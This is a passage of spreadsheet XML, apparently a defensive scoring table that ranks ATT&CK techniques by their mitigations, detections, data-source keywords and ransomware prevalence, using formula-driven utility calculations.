        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L352">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M352" s="25">
        <v>0</v>
      </c>
      <c r="N352" s="51">
        <v>0</v>
      </c>
      <c r="O352" s="51">
        <v>0</v>
      </c>
      <c r="P352" s="51">
        <v>0</v>
      </c>
      <c r="Q352" s="51">
        <v>0</v>
      </c>
      <c r="R352" s="52" t="s">
        <v>1347</v>
      </c>
      <c r="S352" s="51">
        <v>3</v>
      </c>
      <c r="T352" s="52" t="s">
        <v>1348</v>
      </c>
      <c r="U352" s="51">
        <v>9</v>
      </c>
      <c r="V352" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.11428571428571428</v>
      </c>
      <c r="W352">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X352">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y352">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z352">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA352">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB352">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC352" s="29" t="s">
        <v>1412</v>
      </c>
      <c r="AD352" s="25" t="str" cm="1">
        <f t="array" ref="AD352">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC352)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE352" s="25">
        <f>IF(AD352="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF352" s="25" t="str" cm="1">
        <f t="array" ref="AF352">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC352)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG352" s="25">
        <f>IF(AF352="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH352" s="25" t="str" cm="1">
        <f t="array" ref="AH352">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC352)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI352" s="25">
        <f>IF(AH352="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ352" s="25" t="str" cm="1">
        <f t="array" ref="AJ352">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC352)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK352" s="25">
        <f>IF(AJ352="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL352" s="25" t="str" cm="1">
        <f t="array" ref="AL352">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC352)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM352" s="25">
        <f>IF(AL352="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN352" s="52">
        <v>0</v>
      </c>
      <c r="AO352" s="51">
        <v>0</v>
      </c>
      <c r="AP352" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9681428571428568E-2</v>
      </c>
      <c r="AQ352" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.5604761904761902E-2</v>
      </c>
      <c r="AR352" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.5604761904761902E-2</v>
      </c>
      <c r="AS352" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT352" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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53" spans="1:47" ht="80.099999999999994">
      <c r="A353" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7233333333333335E-2</v>
      </c>
      <c r="B353" s="25">
        <f>SUM(H353,M353,V353)*(1+SUM(AE353,AG353,AI353,AK353,AM353))</f>
        <v>0.27233333333333337</v>
      </c>
      <c r="C353" s="25" t="s">
        <v>1413</v>
      </c>
      <c r="D353" s="25" t="s">
        <v>1363</v>
      </c>
      <c r="E353" s="25" t="s">
        <v>1414</v>
      </c>
      <c r="F353" s="51">
        <v>1</v>
      </c>
      <c r="G353" s="51">
        <v>1</v>
      </c>
      <c r="H353" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I353">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J353">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K353">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L353">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M353" s="25">
        <v>0</v>
      </c>
      <c r="N353" s="51">
        <v>0</v>
      </c>
      <c r="O353" s="51">
        <v>0</v>
      </c>
      <c r="P353" s="51">
        <v>0</v>
      </c>
      <c r="Q353" s="51">
        <v>0</v>
      </c>
      <c r="R353" s="52" t="s">
        <v>1415</v>
      </c>
      <c r="S353" s="51">
        <v>3</v>
      </c>
      <c r="T353" s="52" t="s">
        <v>1416</v>
      </c>
      <c r="U353" s="51">
        <v>8</v>
      </c>
      <c r="V353" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190478</v>
      </c>
      <c r="W353">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>11</v>
      </c>
      <c r="X353">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.2</v>
      </c>
      <c r="Y353">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="Z353">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA353">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB353">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC353" s="29" t="s">
        <v>1417</v>
      </c>
      <c r="AD353" s="25" t="str" cm="1">
        <f t="array" ref="AD353">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC353)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE353" s="25">
        <f>IF(AD353="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF353" s="25" t="str" cm="1">
        <f t="array" ref="AF353">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC353)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG353" s="25">
        <f>IF(AF353="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH353" s="25" t="str" cm="1">
        <f t="array" ref="AH353">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC353)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI353" s="25">
        <f>IF(AH353="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ353" s="25" t="str" cm="1">
        <f t="array" ref="AJ353">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC353)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK353" s="25">
        <f>IF(AJ353="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL353" s="25" t="str" cm="1">
        <f t="array" ref="AL353">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC353)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM353" s="25">
        <f>IF(AL353="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN353" s="52">
        <v>0</v>
      </c>
      <c r="AO353" s="51">
        <v>0</v>
      </c>
      <c r="AP353" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.7233333333333335E-2</v>
      </c>
      <c r="AQ353" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.0777777777777791E-2</v>
      </c>
      <c r="AR353" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.0777777777777791E-2</v>
      </c>
      <c r="AS353" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT353" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU35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54" spans="1:47" ht="32.1">
      <c r="A354" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.418571428571428E-2</v>
      </c>
      <c r="B354" s="25">
        <f>SUM(H354,M354,V354)*(1+SUM(AE354,AG354,AI354,AK354,AM354))</f>
        <v>0.1751904761904762</v>
      </c>
      <c r="C354" s="25" t="s">
        <v>1418</v>
      </c>
      <c r="D354" s="25" t="s">
        <v>1324</v>
      </c>
      <c r="E354" s="25" t="s">
        <v>1033</v>
      </c>
      <c r="F354" s="51">
        <v>0</v>
      </c>
      <c r="G354" s="51">
        <v>1</v>
      </c>
      <c r="H354" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I354">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J354">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K354">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L354">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M354" s="25">
        <v>0</v>
      </c>
      <c r="N354" s="51">
        <v>0</v>
      </c>
      <c r="O354" s="51">
        <v>0</v>
      </c>
      <c r="P354" s="51">
        <v>0</v>
      </c>
      <c r="Q354" s="51">
        <v>0</v>
      </c>
      <c r="R354" s="52" t="s">
        <v>1325</v>
      </c>
      <c r="S354" s="51">
        <v>0</v>
      </c>
      <c r="T354" s="52" t="s">
        <v>1035</v>
      </c>
      <c r="U354" s="51">
        <v>11</v>
      </c>
      <c r="V354" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190478</v>
      </c>
      <c r="W354">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>11</v>
      </c>
      <c r="X354">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.2</v>
      </c>
      <c r="Y354">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="Z354">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA354">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB354">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC354" s="29" t="s">
        <v>745</v>
      </c>
      <c r="AD354" s="25" t="str" cm="1">
        <f t="array" ref="AD354">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC354)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE354" s="25">
        <f>IF(AD354="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF354" s="25" t="str" cm="1">
        <f t="array" ref="AF354">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC354)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG354" s="25">
        <f>IF(AF354="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH354" s="25" t="str" cm="1">
        <f t="array" ref="AH354">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC354)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI354" s="25">
        <f>IF(AH354="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ354" s="25" t="str" cm="1">
        <f t="array" ref="AJ354">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC354)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK354" s="25">
        <f>IF(AJ354="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL354" s="25" t="str" cm="1">
        <f t="array" ref="AL354">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC354)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM354" s="25">
        <f>IF(AL354="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN354" s="52">
        <v>2</v>
      </c>
      <c r="AO354" s="51">
        <v>1</v>
      </c>
      <c r="AP354" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.418571428571428E-2</v>
      </c>
      <c r="AQ354" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.8396825396825398E-2</v>
      </c>
      <c r="AR354" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.8396825396825398E-2</v>
      </c>
      <c r="AS354" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT354" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU35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55" spans="1:47" ht="32.1">
      <c r="A355" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.7863809523809526E-2</v>
      </c>
      <c r="B355" s="25">
        <f>SUM(H355,M355,V355)*(1+SUM(AE355,AG355,AI355,AK355,AM355))</f>
        <v>0.24530476190476189</v>
      </c>
      <c r="C355" s="25" t="s">
        <v>1419</v>
      </c>
      <c r="D355" s="25" t="s">
        <v>114</v>
      </c>
      <c r="E355" s="25" t="s">
        <v>1420</v>
      </c>
      <c r="F355" s="51">
        <v>1</v>
      </c>
      <c r="G355" s="51">
        <v>1</v>
      </c>
      <c r="H355" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I355">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J355">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K355">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L355">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M355" s="25">
        <v>0</v>
      </c>
      <c r="N355" s="51">
        <v>1</v>
      </c>
      <c r="O355" s="51">
        <v>1</v>
      </c>
      <c r="P355" s="51">
        <v>2</v>
      </c>
      <c r="Q355" s="51">
        <v>0</v>
      </c>
      <c r="R355" s="52" t="s">
        <v>1275</v>
      </c>
      <c r="S355" s="51">
        <v>3</v>
      </c>
      <c r="T355" s="51" t="s">
        <v>1276</v>
      </c>
      <c r="U355" s="51">
        <v>6</v>
      </c>
      <c r="V355" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190476</v>
      </c>
      <c r="W355">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X355">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y355">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z355">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA355">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB355">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC355" s="29" t="s">
        <v>724</v>
      </c>
      <c r="AD355" s="25" t="str" cm="1">
        <f t="array" ref="AD355">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC355)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE355" s="25">
        <f>IF(AD355="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF355" s="25" t="str" cm="1">
        <f t="array" ref="AF355">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC355)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG355" s="25">
        <f>IF(AF355="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH355" s="25" t="str" cm="1">
        <f t="array" ref="AH355">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC355)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI355" s="25">
        <f>IF(AH355="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ355" s="25" t="str" cm="1">
        <f t="array" ref="AJ355">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC355)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK355" s="25">
        <f>IF(AJ355="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL355" s="25" t="str" cm="1">
        <f t="array" ref="AL355">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC355)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM355" s="25">
        <f>IF(AL355="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN355" s="58">
        <v>1</v>
      </c>
      <c r="AO355" s="51">
        <v>1</v>
      </c>
      <c r="AP355" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.7863809523809526E-2</v>
      </c>
      <c r="AQ355" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.1768253968253962E-2</v>
      </c>
      <c r="AR355" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.1768253968253962E-2</v>
      </c>
      <c r="AS355" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT355" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU35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56" spans="1:47" ht="32.1">
      <c r="A356" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.0476190476190474E-2</v>
      </c>
      <c r="B356" s="25">
        <f>SUM(H356,M356,V356)*(1+SUM(AE356,AG356,AI356,AK356,AM356))</f>
        <v>0.20476190476190476</v>
      </c>
      <c r="C356" s="25" t="s">
        <v>1421</v>
      </c>
      <c r="D356" s="25" t="s">
        <v>1422</v>
      </c>
      <c r="E356" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F356" s="51">
        <v>1</v>
      </c>
      <c r="G356" s="51">
        <v>1</v>
      </c>
      <c r="H356" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I356">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J356">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K356">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L356">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M356" s="25">
        <v>0</v>
      </c>
      <c r="N356" s="51">
        <v>0</v>
      </c>
      <c r="O356" s="51">
        <v>2</v>
      </c>
      <c r="P356" s="51">
        <v>0</v>
      </c>
      <c r="Q356" s="51">
        <v>0</v>
      </c>
      <c r="R356" s="53" t="s">
        <v>156</v>
      </c>
      <c r="S356" s="51">
        <v>2</v>
      </c>
      <c r="T356" s="51" t="s">
        <v>157</v>
      </c>
      <c r="U356" s="51">
        <v>8</v>
      </c>
      <c r="V356" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190476</v>
      </c>
      <c r="W356">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>10</v>
      </c>
      <c r="X356">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Y356">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Z356">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA356">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB356">
